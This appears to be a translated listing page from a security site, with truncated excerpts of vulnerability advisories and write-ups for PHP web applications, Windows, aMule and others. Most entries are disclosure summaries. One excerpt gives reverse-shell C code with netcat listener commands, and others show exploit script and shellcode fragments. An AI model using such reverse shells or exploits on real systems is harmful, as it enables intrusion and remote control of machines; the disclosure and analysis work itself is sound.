Microsoft Windows Help and Support Center whitelist bypass vulnerability
BUGTRAQ ID: 40725, 40721 CVE ID: CVE-2010-1885 Windows is Microsoft's widely used operating system. Windows ships with the Help and Support Center for accessing online documentation; help documents can be opened directly through URLs of the form hcp://. When an hcp:// URL is invoked through the registered protocol handler, the command-line argument /fromhcp is passed to the Help Center application; this flag switches the Help Center into a restricted mode that only allows whitelisted help documents and parameters. The whitelist implementation, however, is not secure and can be bypassed. Before validation, the URL is first normalized and unescaped with the MPC::HTML::UrlUnescapeW function, which uses MPC::HexToNum to...
Introduction to Malware Analysis
In this video, Lenny Zeltser, a SANS instructor, outlines the basic concepts of reverse engineering malware, describing the process of analyzing the code and the behavior of the malware...
phpCollegeExchange 0.1.5c - Multiple SQL Injections
phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities Name phpCollegeExchange Vendor http://phpcollegeex.sourceforge.net Versions Affected 0.1.5c Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta at gmail dot com Date 2009-12-11 X...
OrzHTTPd - Format String
#!/usr/bin/env python # orzex.py -- Patroklos Argyroudis, argp at domain census-labs.com # http://code.google.com/p/orzhttpd/source/detail?r=141 import os, sys, socket, struct, time, urllib GET = "GET " def main(argv): argc = len(argv) if argc != 4: print "usage: %s " % argv[0]...
CubeCart 4 - Session Management Bypass
CubeCart 4 - Session Management Bypass CubeCart 4 Session Management Bypass Release Date: 2009/10/29 Author: Bogdan Calin bogdan at acunetix dot com Severity: Critical Vendor Status: Vendor has released an updated version I. Background From Wikipedia: CubeCart is a free-to-use eCommerce software...
Linux reverse SHELL II - vulnerability warning - the black bar safety net
#include ... (seven headers, names not recovered) void usage(); char *shell = "/bin/sh"; char *message = "s8s8 welcome\n"; int sock; int main(int argc, char *argv[]) { if(argc ... \n", prog); exit(-1); ... Compile with gcc -o f f.c. Then on the listening machine open a port: nc -l -p 8888. Then execute: ./f 192.168.1.14 8888. Note:...
Bo-Blog 2.0.3 backend trojan-planting arbitrary command execution vulnerability - vulnerability warning - the black bar safety net
Article source: www.slenk.net Article author: lone water around the city Today I analyzed the code of Bo-Blog 2.0.3. The starting point was a known injection vulnerability in this version released by Flyh4t. I dug around in the backend for half a day and, looking through the code,...
LxBlog uninitialized variable vulnerability
LxBlog is a multi-user blog system developed by PHPWind on a PHP+MySQL platform. It emphasizes interaction between the site as a whole and individual users, and offers a powerful personal homepage system, an independent second-level domain scheme, a flexible user template system, and rich friend-circle and album features. Code analysis fragment: ======================code================================== /user/tag.php <?php !function_exists('usermsg') && exit('Forbidden'); !in_array($type, $itemtype) && exit;...
aMule 'wxExecute()' arbitrary command execution vulnerability
BUGTRAQ ID: 34683 CNCAN ID: CNCAN-2009042301 aMule is an eDonkey download client similar to eMule. aMule does not properly filter certain characters, and a remote attacker can exploit this to execute arbitrary commands with the privileges of the application. The affected code in src/DownloadListCtrl.cpp: command = wxT("xterm -T \"aMule Preview\" -iconic -e mplayer '$file'"); ... wxString rawFileName = file->GetFullName().GetRaw(); command.Replace(wxT("$file"), ...
6KBBS system backdoor file cracking - vulnerability warning - the black bar safety net
From: Dream an end Hello, I'm Dream an end. In the September issue of Hacker's Handbook I read the article written by my brother lone water around the city, with its ringing alarm bell about staying vigilant against the traps hidden behind websites, and it gave me a lot to think about. In this crazy Internet era, made a rookie your o...
Adobe PDF exploit code analysis
Websense researcher Hermes Li has posted a blow-by-blow walkthrough with screenshots of the Adobe Acrobat/Reader vulnerability that’s currently under attack. Excerpt from the blog post: “This vulnerability is different than the one found at the end of last year Exploit Action with PDF OpenAction ...
Amaya Web Editor 11.0 - XML / HTML Parser
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Amaya web editor XML and HTML parser vulnerabilities 1. Advisory Information Title: Amaya web editor XML and HTML parser vulnerabilities Advisory ID: CORE-2008-1211...
A CGI program vulnerability discovery - vulnerability warning - the black bar safety net
Source: phpeval's BLOG Author: phpeval Yesterday a friend threw a CGI program at me and asked me to think of a way to get a shell. I had never seen this CGI program before; it was a brand-new experience for me, and honestly I had no idea where to start. But since it had been handed to me, I treated it as a learning exercise, bit the bullet, and took a look. The...
IE7 0day shellcode analysis (2) - bug warning - the black bar safety net
The corresponding assembly code is as follows: 0A0FF9FB 58 pop eax 0A0FF9FC 58 pop eax 0A0FF9FD 33DB xor ebx, ebx 0A0FF9FF B3 1C mov bl, 1C 0A0FFA01 03C3 add eax, ebx 0A0FFA03 31C9 xor ecx, ecx 0A0FFA05 66:81E9 65FA sub cx, 0FA65 0A0FFA0A 8030 21 xor byte ptr [eax], 21 0A0FFA0D 40 inc eax...
[MajorSecurity Advisory #53]BLUEPAGE CMS - Cross Site Scripting and Session Fixation Issues
MajorSecurity Advisory 53: BLUEPAGE CMS - Cross Site Scripting and Session Fixation Issues Details ======= Product: BLUEPAGE CMS Security-Risk: moderated Remote-Exploit: yes Vendor-URL: http://www.bluepage-cms.com/ Vendor-Status: informed Advisory-Status: published Credits ============ Discovered b...
Php168 arbitrary file read vulnerability - vulnerability warning - the black bar safety net
Reprint address: http://hi.baidu.com/saiyhi/ Oh, forgot to say, the program's official URL: http://www.php168.com/ Code: ../job.php Line: 117 if(eregi(".php", $url)) die("ERR"); $fileurl = str_replace($webdb[www_url], "", $url); if(is_file(PHP168_PATH."$fileurl") && filesize(PHP168_PATH."$fileurl") 1024 1024 500...
Phpcms 2007 remote file inclusion vulnerability - vulnerability warning - the black bar safety net
Phpcms 2007 remote file include vulnerability url: http://www.wolvez.org/forum/redirect.php?tid=182&goto=lastpost This vulnerability is a fairly common variable-overwrite hole; the way it was discovered in the transfer code is that, if it is a white box, you want to have a...
Apple Xcode .funhouse file XML data handling buffer overflow vulnerability
BUGTRAQ ID: 30189 CVE(CAN) ID: CVE-2008-2304 Xcode is the development toolset used on Apple machines. Xcode includes a sample application named Core Image Fun House that handles content with the .funhouse extension. The Fun House application does not correctly parse XML data, so if a user is tricked into opening a specially crafted .funhouse file, a buffer overflow can be triggered. The following is the code responsible for parsing such files: // render origin handles using AppKit directly - (CIImage *)drawPoints:(CIImage *)im ... NSString...
Dedecms V5 executable file upload vulnerability
This is a rather interesting one, but it is not easy to exploit successfully, heh. First look at the configrglobals.php file; an excerpt is given below. The author's intent here was to register variables for us, but he overlooked that we can not only register variables but also overwrite some existing ones. configrglobalsmagic.php has the same problem. ... if(is_array($_GET)) foreach($_GET AS $key => $value) $$key = $value; // can overwrite any variable ...